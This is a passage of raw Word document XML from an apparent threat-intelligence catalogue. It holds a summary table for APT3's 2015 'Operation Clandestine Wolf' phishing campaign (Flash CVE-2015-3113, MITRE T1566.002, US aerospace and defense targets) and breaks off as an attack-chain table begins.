    </w:p>
    <w:p w14:paraId="1C37E432" w14:textId="273A09C3" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00424E34"/>
    <w:p w14:paraId="7E3CE854" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DE2280" w14:textId="0D852944" w:rsidR="007545F1" w:rsidRDefault="005F77E0" w:rsidP="007545F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc153480862"/>
      <w:r w:rsidRPr="005F77E0">
        <w:lastRenderedPageBreak/>
        <w:t>Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="44DE6350" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="007545F1">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7545F1" w:rsidRPr="002D1D50" w14:paraId="47FE8886" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2294D399" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="69" w:name="OLE_LINK20"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42865EC3" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37EE31F0" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00387DCC" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="56D6B083" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC84956" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40B214C0" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD2DF8C" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00387DCC" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="03CB6EDB" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="053E6357" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="007328DE" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4575BA9A" w14:textId="23F2C084" w:rsidR="007545F1" w:rsidRPr="007328DE" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1566.00</w:t>
            </w:r>
            <w:r w:rsidR="009A5B1E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">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w:t>
            </w:r>
            <w:r w:rsidR="009A5B1E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5084700C" w14:textId="27281989" w:rsidR="007545F1" w:rsidRPr="00387DCC" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="3598FBCF" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E6869A7" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A9F7F1" w14:textId="355C8102" w:rsidR="007545F1" w:rsidRPr="007328DE" w:rsidRDefault="009A5B1E" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7199D54E" w14:textId="17810A31" w:rsidR="007545F1" w:rsidRPr="00387DCC" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[5]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="5FB27D8E" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49011262" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492B1FCE" w14:textId="64C1A37E" w:rsidR="007545F1" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>US</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166FF263" w14:textId="6D47448E" w:rsidR="007545F1" w:rsidRPr="00387DCC" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[5]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="4AE897C4" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D879643" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="359C74D6" w14:textId="0259B1C8" w:rsidR="007545F1" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B759F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Aerospace and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B759F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E3B102E" w14:textId="0E283267" w:rsidR="007545F1" w:rsidRPr="00387DCC" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="58F2E545" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581318FC" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FB27321" w14:textId="670C73B3" w:rsidR="007545F1" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B759F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF7B54C" w14:textId="1E9E722F" w:rsidR="007545F1" w:rsidRDefault="00B759F3" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D3FF9" w:rsidRPr="00B857D7" w14:paraId="1FDE838D" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79527EE6" w14:textId="77777777" w:rsidR="003D3FF9" w:rsidRDefault="003D3FF9" w:rsidP="003D3FF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CDB40E7" w14:textId="1AC8786D" w:rsidR="003D3FF9" w:rsidRDefault="003D3FF9" w:rsidP="003D3FF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D3FF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-2015-3113</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3255C7CB" w14:textId="17C0AB0B" w:rsidR="003D3FF9" w:rsidRDefault="003D3FF9" w:rsidP="003D3FF9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="003D3FF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In June, FireEye’s FireEye as a Service team in Singapore uncovered a phishing campaign exploiting an Adobe Flash Player zero-day vulnerability (CVE-2015-3113)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="1DA250F5" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="366972AB" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0660D7AD" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C3EBB40" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="2206F1D0" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77087E26" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BDC6C05" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7228CB2A" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="58F2EAC8" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F776D3C" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A68B3D" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47386120" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007545F1" w:rsidRPr="00B857D7" w14:paraId="09DA74D0" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A25D28B" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="180B212C" w14:textId="6400C480" w:rsidR="007545F1" w:rsidRDefault="003D3FF9" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E04666E" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="69"/>
    </w:tbl>
    <w:p w14:paraId="1CC003F1" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="00AC7A85" w:rsidRDefault="007545F1" w:rsidP="007545F1"/>
    <w:p w14:paraId="0D63E6C2" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="007545F1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10485" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1958"/>
        <w:gridCol w:w="2463"/>
        <w:gridCol w:w="663"/>
        <w:gridCol w:w="708"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="2693"/>
      </w:tblGrid>
      <w:tr w:rsidR="007545F1" w:rsidRPr="002D1D50" w14:paraId="102C8932" w14:textId="77777777" w:rsidTr="00965198">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4C98486A" w14:textId="77777777" w:rsidR="007545F1" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="70" w:name="OLE_LINK19"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="091EDD3B" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0019E84B" w14:textId="4466B7D2" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT3_00</w:t>
            </w:r>
            <w:r w:rsidR="009A7CF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7CF14023" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4E367614" w14:textId="77777777" w:rsidR="007545F1" w:rsidRPr="002D1D50" w:rsidRDefault="007545F1" w:rsidP="00965198">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
